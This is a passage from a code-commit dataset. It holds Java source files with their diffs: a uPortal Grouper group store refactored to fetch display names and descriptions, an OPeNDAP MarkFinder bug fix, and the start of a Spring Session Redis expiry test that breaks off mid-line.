IEntityGroup eg = it.next(); keys.add(eg.getKey()); } // return an iterator over the assembled list return keys.toArray(new String[keys.size()]); } @SuppressWarnings("unchecked") public Iterator findMemberGroups(IEntityGroup group) throws GroupsException { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching for group-type members of group with key: " + group.getKey()); } try { GcGetGroups getGroups = new GcGetGroups(); getGroups.addSubjectIdentifier(group.getLocalKey()); WsGetGroupsResults results = getGroups.execute(); if (results == null || results.getResults() == null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("No group-type members found for group with key " + group.getKey()); } return Collections.<IEntityGroup>emptyList().iterator(); } final List<IEntityGroup> members = new ArrayList<IEntityGroup>(); for (WsGetGroupsResult wsg : results.getResults()) { if (wsg.getWsGroups() != null) { for (WsGroup g : wsg.getWsGroups()) { IEntityGroup member = createUportalGroupFromGrouperGroup(g); members.add(member); if (LOGGER.isTraceEnabled()) { LOGGER.trace("found IEntityGroup member: " + member); } } } } return members.iterator(); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "member groups of group with key " + group.getKey() + " from Grouper web services", e); return Collections.<IGroupMember>emptyList().iterator(); } } public EntityIdentifier[] searchForGroups(final String query, final int method, @SuppressWarnings("unchecked") final Class leaftype) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching Grouper for groups matching query: " + query); } // result groups. List<EntityIdentifier> groups = new ArrayList<EntityIdentifier>(); try { // TODO: searches need to be performed against the group display // name rather than the group key GcFindGroups groupSearch = new GcFindGroups(); WsQueryFilter filter = new WsQueryFilter(); filter.setQueryFilterType("FIND_BY_GROUP_NAME_APPROXIMATE"); filter.setGroupName(query); groupSearch.assignQueryFilter(filter); WsFindGroupsResults results = groupSearch.execute(); if (results != null && results.getGroupResults() != null) { for (WsGroup g : results.getGroupResults()) { LOGGER.trace("Retrieved group: " + g.getName()); groups.add(new EntityIdentifier(g.getName(), IEntityGroup.class)); } } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Returning " + groups.size() + " results for query " + query); } return (EntityIdentifier[]) groups .toArray(new EntityIdentifier[] {}); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "search results for query " + query + " and entity type " + leaftype.getCanonicalName(), e); return new EntityIdentifier[] {}; } } /** * Test a Grouper {WsGroup} against a query string according to the specified * method and determine if it matches the query. * * @param group WsGroup to be tested * @param query Query string * @param method int-based method matching one of the standard search methods * defined in {IGroupConstants} * @return <code>true</code> if the group matches, <code>false</code> * otherwise */ protected boolean groupMatches(WsGroup group, String query, int method) { // Ensure that this group has a name defined before performing // comparisons. if (group == null || group.getName() == null) { return false; } switch (method) { case IGroupConstants.IS: return group.getName().equals(query); case IGroupConstants.STARTS_WITH: return group.getName().startsWith(query); case IGroupConstants.ENDS_WITH: return group.getName().endsWith(query); case IGroupConstants.CONTAINS: return group.getName().contains(query); default: return false; } } /** * Construct an IEntityGroup from a Grouper WsGroup. * * @param wsGroup * @return the group */ protected IEntityGroup createUportalGroupFromGrouperGroup(WsGroup wsGroup) { IEntityGroup iEntityGroup = new EntityGroupImpl(wsGroup.getName(), IPerson.class); // need to set the group name and description to the actual // display name and description iEntityGroup.setName(wsGroup.getDisplayName()); iEntityGroup.setDescription(wsGroup.getDescription()); return iEntityGroup; } /** * Find the Grouper group matching the specified key. * * @param key * @return the group or null */ protected WsGroup findGroupFromKey(String key) { GcFindGroups gcFindGroups = new GcFindGroups(); gcFindGroups.addGroupName(key); WsFindGroupsResults results = gcFindGroups.execute(); // if no results were returned, return null if (results == null || results.getGroupResults() == null || results.getGroupResults().length == 0) { LOGGER.debug("Grouper service returned no matches for key " + key); return null; } // construct a uPortal group representation of the first returned // result WsGroup wsGroup = results.getGroupResults()[0]; return wsGroup; } /* * UNSUPPORTED WRITE OPERATIONS * * The Grouper group service does not currently support operations that * require write access or locking. This implementation may be updated * in the future to include those features. */ /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#update(org.jasig.portal.groups.IEntityGroup) */ public void update(IEntityGroup group) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#updateMembers(org.jasig.portal.groups.IEntityGroup) */ public void updateMembers(IEntityGroup group) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#delete(org.jasig.portal.groups.IEntityGroup) */ public void delete(IEntityGroup group) throws GroupsException { throw new UnsupportedOperationException( "Group deletion is not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findLockable(java.lang.String) */ public ILockableEntityGroup findLockable(String key) throws GroupsException { throw new UnsupportedOperationException( "Group locking is not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#newInstance(java.lang.Class) */ @SuppressWarnings("unchecked") public IEntityGroup newInstance(Class entityType) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityStore#newInstance(java.lang.String) */ public IEntity newInstance(String key) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityStore#newInstance(java.lang.String, java.lang.Class) */ @SuppressWarnings("unchecked") public IEntity newInstance(String key, Class type) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntitySearcher#searchForEntities(java.lang.String, int, java.lang.Class) */ @SuppressWarnings("unchecked") public EntityIdentifier[] searchForEntities(String query, int method, Class type) throws GroupsException { throw new UnsupportedOperationException( "Entity search is not supported by the Grouper groups service"); } }
uportal-war/src/main/java/org/jasig/portal/groups/grouper/GrouperEntityGroupStore.java
/** * Licensed to Jasig under one or more contributor license * agreements. See the NOTICE file distributed with this work * for additional information regarding copyright ownership. * Jasig licenses this file to you under the Apache License, * Version 2.0 (the "License"); you may not use this file * except in compliance with the License. You may obtain a * copy of the License at: * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.jasig.portal.groups.grouper; import java.util.ArrayList; import java.util.Collections; import java.util.Iterator; import java.util.LinkedList; import java.util.List; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.jasig.portal.EntityIdentifier; import org.jasig.portal.groups.EntityGroupImpl; import org.jasig.portal.groups.EntityImpl; import org.jasig.portal.groups.GroupsException; import org.jasig.portal.groups.IEntity; import org.jasig.portal.groups.IEntityGroup; import org.jasig.portal.groups.IEntityGroupStore; import org.jasig.portal.groups.IEntitySearcher; import org.jasig.portal.groups.IEntityStore; import org.jasig.portal.groups.IGroupConstants; import org.jasig.portal.groups.IGroupMember; import org.jasig.portal.groups.ILockableEntityGroup; import org.jasig.portal.security.IPerson; import edu.internet2.middleware.grouperClient.api.GcFindGroups; import edu.internet2.middleware.grouperClient.api.GcGetGroups; import edu.internet2.middleware.grouperClient.api.GcGetMembers; import edu.internet2.middleware.grouperClient.ws.beans.WsFindGroupsResults; import edu.internet2.middleware.grouperClient.ws.beans.WsGetGroupsResult; import edu.internet2.middleware.grouperClient.ws.beans.WsGetGroupsResults; import edu.internet2.middleware.grouperClient.ws.beans.WsGetMembersResults; import edu.internet2.middleware.grouperClient.ws.beans.WsGroup; import edu.internet2.middleware.grouperClient.ws.beans.WsQueryFilter; import edu.internet2.middleware.grouperClient.ws.beans.WsSubject; /** * GrouperEntityGroupStore provides an implementation of the group store * interface capable of retrieving groups information from Grouper web services. * This implementation uses the standard Grouper client jar to search for group * information. It does not currently support write access or group locking. * * @author Bill Brown * @author Jen Bourey, [email protected] * @version $Revision$ */ public class GrouperEntityGroupStore implements IEntityGroupStore, IEntityStore, IEntitySearcher { /** Logger. */ protected final Log LOGGER = LogFactory .getLog(GrouperEntityGroupStoreFactory.class); /** * Package protected constructor used by the factory method. */ GrouperEntityGroupStore() { /* Package protected. */ if (LOGGER.isDebugEnabled()) { LOGGER.debug(this + " created"); } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#contains(org.jasig.portal.groups.IEntityGroup, org.jasig.portal.groups.IGroupMember) */ public boolean contains(IEntityGroup group, IGroupMember member) throws GroupsException { // TODO: Original implementation simply returned the existence of // the member group in the Grouper service. We need to instead // determine if the parent group contains the member. return false; } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#find(java.lang.String) */ public IEntityGroup find(String key) throws GroupsException { try { // Search the Grouper server for groups with the specified local // key LOGGER.debug("Searching Grouper for a direct match for key: " + key); GcGetGroups getGroups = new GcGetGroups(); getGroups.addSubjectIdentifier(key); WsGetGroupsResults results = getGroups.execute(); // if no results were returned, return null if (results == null || results.getResults() == null || results.getResults().length == 0) { LOGGER.debug("Grouper service returned no matches for key " + key); return null; } // construct a uPortal group representation of the first returned // result WsSubject subject = results.getResults()[0].getWsSubject(); IEntityGroup group = new EntityGroupImpl(subject.getName(), IPerson.class); // TODO: need to set the group name and description to the actual // display name and description group.setName(subject.getName()); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Retrieved group from the Grouper server matching key " + key + ": " + group.toString()); } // return the group return group; } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "group with key " + key + " from Grouper web services", e); return null; } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findContainingGroups(org.jasig.portal.groups.IGroupMember) */ @SuppressWarnings("unchecked") public Iterator findContainingGroups(IGroupMember gm) throws GroupsException { if (gm.isGroup()) { // TODO: need to add support for retrieving the parents of // groups return new LinkedList<IEntityGroup>().iterator(); } else { GcGetGroups getGroups = new GcGetGroups(); // Determine the key to use for this entity. If the entity is a // group, we should use the group's local key (excluding the // "grouper." portion of the full key. If the entity is not a // group type, just use the key. String key = null; if (gm instanceof IEntityGroup) { key = ((IEntityGroup) gm).getLocalKey(); } else { key = gm.getKey(); } getGroups.addSubjectIdentifier(key); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching Grouper for parent groups of the entity with key: " + key); } try { WsGetGroupsResults results = getGroups.execute(); final List<IEntityGroup> parents = new LinkedList<IEntityGroup>(); if (results == null || results.getResults() == null || results.getResults().length == 0) { LOGGER.debug("Grouper service returned no matches for key " + key); return parents.iterator(); } // add each returned group to the parents list for (WsGetGroupsResult wsg : results.getResults()) { if (wsg.getWsGroups() != null) { for (WsGroup g : wsg.getWsGroups()) { if (LOGGER.isDebugEnabled()) { LOGGER.trace("Retrieved group: " + g.getName()); } IEntityGroup parent = new EntityGroupImpl(g.getName(), IPerson.class); // TODO: set display name and description parent.setName(g.getName()); } } } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Retrieved " + parents.size() + " parent groups of entity with key " + key); } return parents.iterator(); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "parents for entity with key " + key + " from Grouper web services", e); return Collections.<IEntityGroup>emptyList().iterator(); } } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findEntitiesForGroup(org.jasig.portal.groups.IEntityGroup) */ @SuppressWarnings("unchecked") public Iterator findEntitiesForGroup(IEntityGroup group) throws GroupsException { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching Grouper for members of the group with key: " + group.getKey()); } try { // execute a search for members of the specified group GcGetMembers getGroupsMembers = new GcGetMembers(); getGroupsMembers.addGroupName(group.getLocalKey()); WsGetMembersResults results = getGroupsMembers.execute(); if (results == null || results.getResults() == null || results.getResults().length == 0 || results.getResults()[0].getWsSubjects() == null) { LOGGER.debug("No members found for Grouper group with key " + group.getLocalKey()); return Collections.<IGroupMember>emptyList().iterator(); } WsSubject[] gInfos = results.getResults()[0].getWsSubjects(); final List<IGroupMember> members = new ArrayList<IGroupMember>( gInfos.length); // add each result to the member list for (WsSubject gInfo : gInfos) { // TODO: Is there more reliable logic for determining the entity // type of a Grouper result? // if the member is a person group if (gInfo.getName() != null && gInfo.getName().contains(":")) { LOGGER.trace("creating group member: " + gInfo.getName()); IEntityGroup member = new EntityGroupImpl(gInfo.getAttributeValue(4), IPerson.class); // TODO: set display name and description member.setName(gInfo.getAttributeValue(4)); members.add(member); } // otherwise assume the member is an individual person else { LOGGER.trace("creating leaf member: " + gInfo.getId()); IGroupMember member = new EntityImpl(gInfo.getId(), IPerson.class); members.add(member); } } // return an iterator for the assembled group return members.iterator(); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "member entities of group with key " + group.getKey() + " from Grouper web services", e); return Collections.<IGroupMember>emptyList().iterator(); } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findMemberGroupKeys(org.jasig.portal.groups.IEntityGroup) */ @SuppressWarnings("unchecked") public String[] findMemberGroupKeys(IEntityGroup group) throws GroupsException { // first the get an iterator for the member groups final Iterator<IEntityGroup> it = findMemberGroups(group); // construct a list of group keys from this iterator List<String> keys = new ArrayList<String>(); while (it.hasNext()) { IEntityGroup eg = it.next(); keys.add(eg.getKey()); } // return an iterator over the assembled list return keys.toArray(new String[keys.size()]); } @SuppressWarnings("unchecked") public Iterator findMemberGroups(IEntityGroup group) throws GroupsException { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching for group-type members of group with key: " + group.getKey()); } try { GcGetGroups getGroups = new GcGetGroups(); getGroups.addSubjectIdentifier(group.getLocalKey()); WsGetGroupsResults results = getGroups.execute(); if (results == null || results.getResults() == null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("No group-type members found for group with key " + group.getKey()); } return Collections.<IEntityGroup>emptyList().iterator(); } final List<IEntityGroup> members = new ArrayList<IEntityGroup>(); for (WsGetGroupsResult wsg : results.getResults()) { if (wsg.getWsGroups() != null) { for (WsGroup g : wsg.getWsGroups()) { IEntityGroup member = new EntityGroupImpl(g.getName(), IPerson.class); // TODO: set display name and description member.setName(g.getName()); members.add(member); if (LOGGER.isTraceEnabled()) { LOGGER.trace("found IEntityGroup member: " + member); } } } } return members.iterator(); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "member groups of group with key " + group.getKey() + " from Grouper web services", e); return Collections.<IGroupMember>emptyList().iterator(); } } public EntityIdentifier[] searchForGroups(final String query, final int method, @SuppressWarnings("unchecked") final Class leaftype) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching Grouper for groups matching query: " + query); } // result groups. List<EntityIdentifier> groups = new ArrayList<EntityIdentifier>(); try { // TODO: searches need to be performed against the group display // name rather than the group key GcFindGroups groupSearch = new GcFindGroups(); WsQueryFilter filter = new WsQueryFilter(); filter.setQueryFilterType("FIND_BY_GROUP_NAME_APPROXIMATE"); filter.setGroupName(query); groupSearch.assignQueryFilter(filter); WsFindGroupsResults results = groupSearch.execute(); if (results != null && results.getGroupResults() != null) { for (WsGroup g : results.getGroupResults()) { LOGGER.trace("Retrieved group: " + g.getName()); groups.add(new EntityIdentifier(g.getName(), IEntityGroup.class)); } } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Returning " + groups.size() + " results for query " + query); } return (EntityIdentifier[]) groups .toArray(new EntityIdentifier[] {}); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "search results for query " + query + " and entity type " + leaftype.getCanonicalName(), e); return new EntityIdentifier[] {}; } } /** * Test a Grouper {WsGroup} against a query string according to the specified * method and determine if it matches the query. * * @param group WsGroup to be tested * @param query Query string * @param method int-based method matching one of the standard search methods * defined in {IGroupConstants} * @return <code>true</code> if the group matches, <code>false</code> * otherwise */ protected boolean groupMatches(WsGroup group, String query, int method) { // Ensure that this group has a name defined before performing // comparisons. if (group == null || group.getName() == null) { return false; } switch (method) { case IGroupConstants.IS: return group.getName().equals(query); case IGroupConstants.STARTS_WITH: return group.getName().startsWith(query); case IGroupConstants.ENDS_WITH: return group.getName().endsWith(query); case IGroupConstants.CONTAINS: return group.getName().contains(query); default: return false; } } /* * UNSUPPORTED WRITE OPERATIONS * * The Grouper group service does not currently support operations that * require write access or locking. This implementation may be updated * in the future to include those features. */ /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#update(org.jasig.portal.groups.IEntityGroup) */ public void update(IEntityGroup group) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#updateMembers(org.jasig.portal.groups.IEntityGroup) */ public void updateMembers(IEntityGroup group) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#delete(org.jasig.portal.groups.IEntityGroup) */ public void delete(IEntityGroup group) throws GroupsException { throw new UnsupportedOperationException( "Group deletion is not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findLockable(java.lang.String) */ public ILockableEntityGroup findLockable(String key) throws GroupsException { throw new UnsupportedOperationException( "Group locking is not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#newInstance(java.lang.Class) */ @SuppressWarnings("unchecked") public IEntityGroup newInstance(Class entityType) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityStore#newInstance(java.lang.String) */ public IEntity newInstance(String key) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityStore#newInstance(java.lang.String, java.lang.Class) */ @SuppressWarnings("unchecked") public IEntity newInstance(String key, Class type) throws GroupsException { throw new UnsupportedOperationException( "Group updates are not supported by the Grouper groups service"); } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntitySearcher#searchForEntities(java.lang.String, int, java.lang.Class) */ @SuppressWarnings("unchecked") public EntityIdentifier[] searchForEntities(String query, int method, Class type) throws GroupsException { throw new UnsupportedOperationException( "Entity search is not supported by the Grouper groups service"); } }
UP-2670 Updating the Grouper group store to collect display names and descriptions from Grouper web services. git-svn-id: 477788cc2a8229a747c5b8073e47c1d0f6ec0604@21571 f5dbab47-78f9-eb45-b975-e544023573eb
uportal-war/src/main/java/org/jasig/portal/groups/grouper/GrouperEntityGroupStore.java
UP-2670 Updating the Grouper group store to collect display names and descriptions from Grouper web services.
<ide><path>portal-war/src/main/java/org/jasig/portal/groups/grouper/GrouperEntityGroupStore.java <ide> // Search the Grouper server for groups with the specified local <ide> // key <ide> LOGGER.debug("Searching Grouper for a direct match for key: " + key); <del> GcGetGroups getGroups = new GcGetGroups(); <del> getGroups.addSubjectIdentifier(key); <del> WsGetGroupsResults results = getGroups.execute(); <del> <del> // if no results were returned, return null <del> if (results == null || results.getResults() == null <del> || results.getResults().length == 0) { <del> LOGGER.debug("Grouper service returned no matches for key " + key); <del> return null; <del> } <del> <del> // construct a uPortal group representation of the first returned <del> // result <del> WsSubject subject = results.getResults()[0].getWsSubject(); <del> IEntityGroup group = new EntityGroupImpl(subject.getName(), IPerson.class); <del> <del> // TODO: need to set the group name and description to the actual <del> // display name and description <del> group.setName(subject.getName()); <del> <add> WsGroup wsGroup = findGroupFromKey(key); <add> if (wsGroup == null) { <add> return null; <add> } <add> IEntityGroup group = createUportalGroupFromGrouperGroup(wsGroup); <add> <ide> if (LOGGER.isDebugEnabled()) { <ide> LOGGER.debug("Retrieved group from the Grouper server matching key " <ide> + key + ": " + group.toString()); <ide> if (LOGGER.isDebugEnabled()) { <ide> LOGGER.trace("Retrieved group: " + g.getName()); <ide> } <del> IEntityGroup parent = new EntityGroupImpl(g.getName(), IPerson.class); <del> // TODO: set display name and description <del> parent.setName(g.getName()); <add> IEntityGroup parent = createUportalGroupFromGrouperGroup(g); <ide> } <ide> } <ide> } <ide> // if the member is a person group <ide> if (gInfo.getName() != null && gInfo.getName().contains(":")) { <ide> LOGGER.trace("creating group member: " + gInfo.getName()); <del> IEntityGroup member = new EntityGroupImpl(gInfo.getAttributeValue(4), IPerson.class); <del> // TODO: set display name and description <del> member.setName(gInfo.getAttributeValue(4)); <del> members.add(member); <add> <add> WsGroup wsGroup = findGroupFromKey(gInfo.getAttributeValue(4)); <add> if (wsGroup != null) { <add> IEntityGroup member = createUportalGroupFromGrouperGroup(wsGroup); <add> members.add(member); <add> } <ide> } <ide> <ide> // otherwise assume the member is an individual person <ide> for (WsGetGroupsResult wsg : results.getResults()) { <ide> if (wsg.getWsGroups() != null) { <ide> for (WsGroup g : wsg.getWsGroups()) { <del> IEntityGroup member = new EntityGroupImpl(g.getName(), IPerson.class); <del> // TODO: set display name and description <del> member.setName(g.getName()); <add> IEntityGroup member = createUportalGroupFromGrouperGroup(g); <ide> members.add(member); <ide> if (LOGGER.isTraceEnabled()) { <ide> LOGGER.trace("found IEntityGroup member: " + member); <ide> } <ide> } <ide> <del> <add> /** <add> * Construct an IEntityGroup from a Grouper WsGroup. <add> * <add> * @param wsGroup <add> * @return the group <add> */ <add> protected IEntityGroup createUportalGroupFromGrouperGroup(WsGroup wsGroup) { <add> IEntityGroup iEntityGroup = new EntityGroupImpl(wsGroup.getName(), <add> IPerson.class); <add> <add> // need to set the group name and description to the actual <add> // display name and description <add> iEntityGroup.setName(wsGroup.getDisplayName()); <add> iEntityGroup.setDescription(wsGroup.getDescription()); <add> return iEntityGroup; <add> } <add> <add> /** <add> * Find the Grouper group matching the specified key. <add> * <add> * @param key <add> * @return the group or null <add> */ <add> protected WsGroup findGroupFromKey(String key) { <add> GcFindGroups gcFindGroups = new GcFindGroups(); <add> gcFindGroups.addGroupName(key); <add> WsFindGroupsResults results = gcFindGroups.execute(); <add> <add> // if no results were returned, return null <add> if (results == null || results.getGroupResults() == null <add> || results.getGroupResults().length == 0) { <add> LOGGER.debug("Grouper service returned no matches for key " + key); <add> return null; <add> } <add> <add> // construct a uPortal group representation of the first returned <add> // result <add> WsGroup wsGroup = results.getGroupResults()[0]; <add> return wsGroup; <add> } <add> <ide> /* <ide> * UNSUPPORTED WRITE OPERATIONS <ide> *
Java
lgpl-2.1
e672a0c1db6b7cf6a6f776bb92306b482a8d77ad
0
OPENDAP/olfs,OPENDAP/olfs,OPENDAP/olfs,OPENDAP/olfs,OPENDAP/olfs,OPENDAP/olfs
///////////////////////////////////////////////////////////////////////////// // This file is part of the "OPeNDAP 4 Data Server (aka Hyrex)" project. // // // Copyright (c) 2006 OPeNDAP, Inc. // Author: Nathan David Potter <[email protected]> // // This library is free software; you can redistribute it and/or // modify it under the terms of the GNU Lesser General Public // License as published by the Free Software Foundation; either // version 2.1 of the License, or (at your option) any later version. // // This library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU // Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public // License along with this library; if not, write to the Free Software // Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA // // You can contact OPeNDAP, Inc. at PO Box 112, Saunderstown, RI. 02874-0112. ///////////////////////////////////////////////////////////////////////////// package opendap.ppt; import org.slf4j.Logger; /** * Created by IntelliJ IDEA. * User: ndp * Date: Feb 9, 2006 * Time: 1:23:14 PM * To change this template use File | Settings | File Templates. */ public class MarkFinder { private int _markIndex; private byte[] _mark; Logger log; public MarkFinder(byte[] mark){ _mark = mark.clone(); _markIndex = 0; log = org.slf4j.LoggerFactory.getLogger(getClass()); log.debug("New MarkFinder. _mark="+new String(_mark)); } public byte[] getMark(){ return _mark.clone(); } public int getMarkIndex(){ return _markIndex; } public boolean markCheck(byte b) { if (_mark[_markIndex] == b) { log.debug("Found mark byte: "+b+" at index: "+_markIndex); _markIndex++; if (_markIndex == _mark.length) { _markIndex = 0; return (true); } } else if (_mark[0] == b) { log.debug("."); _markIndex = 1; } else { log.debug("*"); _markIndex = 0; } return false; } }
src/opendap/ppt/MarkFinder.java
///////////////////////////////////////////////////////////////////////////// // This file is part of the "OPeNDAP 4 Data Server (aka Hyrex)" project. // // // Copyright (c) 2006 OPeNDAP, Inc. // Author: Nathan David Potter <[email protected]> // // This library is free software; you can redistribute it and/or // modify it under the terms of the GNU Lesser General Public // License as published by the Free Software Foundation; either // version 2.1 of the License, or (at your option) any later version. // // This library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU // Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public // License along with this library; if not, write to the Free Software // Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA // // You can contact OPeNDAP, Inc. at PO Box 112, Saunderstown, RI. 02874-0112. ///////////////////////////////////////////////////////////////////////////// package opendap.ppt; import org.slf4j.Logger; /** * Created by IntelliJ IDEA. * User: ndp * Date: Feb 9, 2006 * Time: 1:23:14 PM * To change this template use File | Settings | File Templates. */ public class MarkFinder { private int _markIndex; private byte[] _mark; Logger log; public MarkFinder(byte[] mark){ _mark = mark.clone(); _markIndex = 0; log = org.slf4j.LoggerFactory.getLogger(getClass()); log.debug("New MarkFinder. _mark="+new String(_mark)); } public byte[] getMark(){ return _mark.clone(); } public int getMarkIndex(){ return _markIndex; } public boolean markCheck(byte b) { if (_mark[_markIndex] == b) { log.debug("Found mark byte: "+b+" at index: "+_markIndex); _markIndex++; if (_markIndex == _mark.length) { _markIndex = 0; return (true); } } else { log.debug("*"); _markIndex = 0; } return false; } }
olfs: Fixed bug in PPT MarkFinder
src/opendap/ppt/MarkFinder.java
olfs: Fixed bug in PPT MarkFinder
<ide><path>rc/opendap/ppt/MarkFinder.java <ide> _markIndex = 0; <ide> log = org.slf4j.LoggerFactory.getLogger(getClass()); <ide> <del> log.debug("New MarkFinder. _mark="+new String(_mark)); <add> log.debug("New MarkFinder. _mark="+new String(_mark)); <ide> } <ide> <ide> public byte[] getMark(){ <ide> _markIndex = 0; <ide> return (true); <ide> } <add> } else if (_mark[0] == b) { <add> log.debug("."); <add> _markIndex = 1; <ide> } else { <del> log.debug("*"); <del> _markIndex = 0; <add> log.debug("*"); <add> _markIndex = 0; <ide> } <ide> <ide> return false;
Java
apache-2.0
0f09d5e0009a4be6483b4567826cf83010c48dba
0
vpavic/spring-session,vpavic/spring-session,vpavic/spring-session
/* * Copyright 2002-2014 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ package org.springframework.session.data.redis.config.annotation.web.http; import static org.fest.assertions.Assertions.assertThat; import java.io.IOException; import java.net.ServerSocket; import org.junit.Before; import org.junit.Test; import org.junit.runner.RunWith; import org.springframework.beans.BeansException; import org.springframework.beans.factory.DisposableBean; import org.springframework.beans.factory.InitializingBean; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.beans.factory.config.ConfigurableListableBeanFactory; import org.springframework.beans.factory.support.BeanDefinitionRegistry; import org.springframework.beans.factory.support.BeanDefinitionRegistryPostProcessor; import org.springframework.context.ApplicationListener; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import org.springframework.data.redis.connection.jedis.JedisConnectionFactory; import org.springframework.scheduling.annotation.EnableScheduling; import org.springframework.security.authentication.UsernamePasswordAuthenticationToken; import org.springframework.security.core.Authentication; import org.springframework.security.core.authority.AuthorityUtils; import org.springframework.security.core.context.SecurityContext; import org.springframework.security.core.context.SecurityContextHolder; import org.springframework.session.ExpiringSession; import org.springframework.session.Session; import org.springframework.session.SessionRepository; import org.springframework.session.data.redis.config.annotation.web.http.EnableRedisHttpSession; import org.springframework.session.events.SessionDestroyedEvent; import org.springframework.test.context.ContextConfiguration; import org.springframework.test.context.junit4.SpringJUnit4ClassRunner; import redis.clients.jedis.Protocol; import redis.embedded.RedisServer; @RunWith(SpringJUnit4ClassRunner.class) @ContextConfiguration public class EnableRedisHttpSessionExpireSessionDestroyedTests<S extends ExpiringSession> { private RedisServer redisServer; @Autowired private SessionRepository<S> repository; @Autowired private SessionDestroyedEventRegistry registry; private final Object lock = new Object(); @Before public void setup() { registry.setLock(lock); } @Test public void expireFiresSessionDestroyedEvent() throws InterruptedException { S toSave = repository.createSession(); toSave.setAttribute("a", "b"); Authentication toSaveToken = new UsernamePasswordAuthenticationToken("user","password", AuthorityUtils.createAuthorityList("ROLE_USER")); SecurityContext toSaveContext = SecurityContextHolder.createEmptyContext(); toSaveContext.setAuthentication(toSaveToken); toSave.setAttribute("SPRING_SECURITY_CONTEXT", toSaveContext); repository.save(toSave); synchronized (lock) { lock.wait((toSave.getMaxInactiveIntervalInSeconds() * 1000) + 1); } if(!registry.receivedEvent()) { // Redis makes no guarantees on when an expired event will be fired // we can ensure it gets fired by trying to get the session repository.getSession(toSave.getId()); synchronized (lock) { if(!registry.receivedEvent()) { // wait at most second to process the event lock.wait(1000); } } } assertThat(registry.receivedEvent()).isTrue(); } static class SessionDestroyedEventRegistry implements ApplicationListener<SessionDestroyedEvent> { private boolean receivedEvent; private Object lock; @Override public void onApplicationEvent(SessionDestroyedEvent event) { synchronized (lock) { receivedEvent = true; lock.notifyAll(); } } public boolean receivedEvent() { return receivedEvent; } public void setLock(Object 